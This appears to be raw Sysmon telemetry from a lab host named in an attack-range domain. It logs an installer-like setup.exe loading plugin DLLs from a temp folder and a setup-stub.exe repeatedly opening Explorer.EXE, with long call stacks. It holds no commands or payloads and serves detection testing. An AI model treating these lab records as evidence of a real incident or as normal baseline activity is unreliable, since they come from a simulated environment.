13:59:52.068{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000014072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.052{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\CityHash.dll2021-01-18 13:59:52.052 11241100x800000000000000014071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.005{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\UAC.dll2021-01-18 13:59:52.005 11241100x800000000000000014070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.005{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\System.dll2021-01-18 13:59:52.005 10341000x800000000000000016520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.911{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
